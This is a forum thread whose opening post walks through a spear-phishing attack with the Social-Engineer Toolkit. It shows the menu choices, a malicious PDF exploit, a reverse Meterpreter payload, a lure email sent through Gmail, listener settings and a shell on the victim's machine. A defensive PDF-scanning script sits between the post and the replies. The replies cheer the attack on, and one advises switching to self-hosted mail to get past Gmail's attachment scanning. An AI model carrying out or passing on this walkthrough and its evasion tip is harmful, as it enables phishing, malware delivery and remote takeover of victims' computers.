Spear-Phishing Attack Vector
#1
As mentioned previously, the spear-phishing attack vector can be used to send targeted emails with malicious attachments. In this example we are going to craft an attack, integrate it with Gmail and send a malicious PDF to the victim. One thing to note is that you can create and save your own templates for future SE attacks, or you can use pre-built ones. Also note that when using SET and pressing Enter for the defaults, it will always use port 443 for the reverse connection and a reverse Meterpreter payload.

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1. Adobe CoolType SING Table 'uniqueName' Overflow (0day)
2. Adobe Flash Player 'newfunction' Invalid Pointer Use
3. Adobe Collab.collectEmailInfo Buffer Overflow
4. Adobe Collab.getIcon Buffer Overflow
5. Adobe JBIG2Decode Memory Corruption Exploit
6. Adobe PDF Embedded EXE Social Engineering
7. Adobe util.printf() Buffer Overflow
8. Custom EXE to VBA (sent via RAR) (RAR required)
9. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 1

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf

[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1
Below is a list of available templates:

1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report

Enter the number you want to use: 7

Enter who you want to send email to: [email protected]

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: [email protected]
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***


=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...

msf exploit(handler) >
Once the attack is all set up, the victim opens the email and then opens the PDF:

[Image: Image001.jpg]

As soon as the victim opens the attachment, a shell is presented back to us:

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at
Thu Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The spear-phishing attack can be sent to multiple people or to individuals; it integrates with Google Mail and can be completely customized based on your needs for the attack vector. Overall this is very effective for email spear-phishing.

Credit/source: Social Engineer.

If you are using BackTrack 5 R1, its display is a bit different from this, because SET has been updated, but the tool can still be used.
Thanks
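
A defender-side check for the attachment type this walkthrough relies on, added here as an example (not SET's code and not part of the original post): it flags PDFs that combine an embedded file with an auto-run action, which is the layout the "Adobe PDF Embedded EXE Social Engineering" option produces. The PDF samples inside the block are constructed for the demo.

```python
"""Triage check for PDF attachments built the way the SET 'PDF Embedded EXE'
option builds them: an embedded file stream plus an action that launches or
scripts it. Added example for mail-gateway or incident-response scripting,
not part of SET or the original post; the sample PDFs are constructed for
the demo and carry no real payload."""
import re

EMBED_KEYS = (b"/EmbeddedFile", b"/EmbeddedFiles")
ACTION_KEYS = (b"/Launch", b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")


def _has_key(data: bytes, key: bytes) -> bool:
    # Match the PDF name token exactly so '/JS' does not match '/JSX' etc.
    return re.search(re.escape(key) + rb"(?![A-Za-z0-9])", data) is not None


def scan_pdf(data: bytes) -> dict:
    """Return the risky names found and a verdict for the attachment.
    Either feature alone is common in benign files (form scripts, attached
    spreadsheets), so 'suspicious' requires an embedded file AND an action.
    Names inside compressed object streams (/ObjStm) are invisible to a
    byte scan, so that case is reported rather than called clean."""
    if not data.startswith(b"%PDF-"):
        return {"hits": [], "verdict": "not-a-pdf"}
    hits = [k.decode() for k in EMBED_KEYS + ACTION_KEYS if _has_key(data, k)]
    embedded = any(k.decode() in hits for k in EMBED_KEYS)
    action = any(k.decode() in hits for k in ACTION_KEYS)
    if embedded and action:
        verdict = "suspicious"
    elif _has_key(data, b"/ObjStm"):
        verdict = "needs-decompression"
    else:
        verdict = "clean-by-byte-scan"
    return {"hits": hits, "verdict": verdict}


# Constructed samples (not real files): a minimal benign PDF and one that
# declares an embedded file plus a /Launch action wired to /OpenAction.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
EMBEDDED_EXE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 3 0 R"
    b" /Names << /EmbeddedFiles 4 0 R >> >> endobj\n"
    b"3 0 obj << /S /Launch /F (template.pdf) >> endobj\n"
    b"5 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PDF), ("embedded-exe", EMBEDDED_EXE_PDF)):
        print(name, scan_pdf(blob))
```

A "needs-decompression" verdict means the object dictionaries are packed in object streams and the file should be inflated (e.g. with a PDF parsing library) before trusting a byte-level result.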

#2
Wow..
Cool..

#3
Nice bro,
I'll try it later.

#4
+1 from me.
Thanks for the post.

#5
I am subscribing to this thread for future reference.
Thanks for the post.
+1 rep from me.

#6
SET is a great tool with many exploits.

Very good tutorial, +1 from me.

#7
Yes, with SET we can do many things.

#8
Somebody please help me.
When I run this tutorial, I get a problem like the following:
set:phishing>1
set:phishing> Your gmail email address:[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://support.google.com/mail/bin/answe...nswer=6590 to\n5.7.0 review our attachment guidelines. a10sm7305336paz.35')
Connection unexpectedly closed

Press <return> to continue

Please help me, brothers, to troubleshoot this problem.
I don't know what to do,
so I am asking all of you.

#9
(10-30-2012, 03:58 PM)thecode1315 Wrote: Somebody please help me.
When I run this tutorial, I get a problem like the following:
set:phishing>1
set:phishing> Your gmail email address:[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit /mail/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. a10sm7305336paz.35')
Connection unexpectedly closed

Press <return> to continue

Please help me, brothers, to troubleshoot this problem.
I don't know what to do,
so I am asking all of you.

Just like the error said, don't use Gmail, because it has malware detection and your attachment will be deleted at once.
Use your own hosted mail; if you have hosting with cPanel you will have plenty of mail addresses to try.

#10
Can the technique be done across different IP ranges?
For example, I use a broadband modem, and I would send an email to my friend who is on another network. Would it work that way?

I am also curious whether the technique applies to Windows XP only, or whether it can be used on Windows 7.
